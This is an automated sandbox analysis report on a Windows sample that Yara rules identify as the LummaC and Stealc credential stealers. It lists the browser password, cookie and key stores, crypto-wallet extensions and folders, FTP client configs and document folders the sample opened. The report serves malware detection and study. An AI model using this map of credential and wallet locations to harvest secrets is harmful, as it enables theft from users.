Source: BVGvbpplT8.exe String found in binary or memory: Wallets/Ethereum
Source: BVGvbpplT8.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BVGvbpplT8.exe, 00000001.00000003.2349314249.0000000000D50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH Jump to behavior
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH Jump to behavior
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: number of queries: 1001
Yara detected Credential Stealer
Source: Yara match File source: 00000001.00000003.2348831866.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2348964663.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BVGvbpplT8.exe PID: 4060, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: BVGvbpplT8.exe PID: 4060, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 0000000E.00000002.2628879138.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2625371744.0000000000451000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2570990607.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: O215CKAM4VJZ3EV7.exe PID: 8020, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
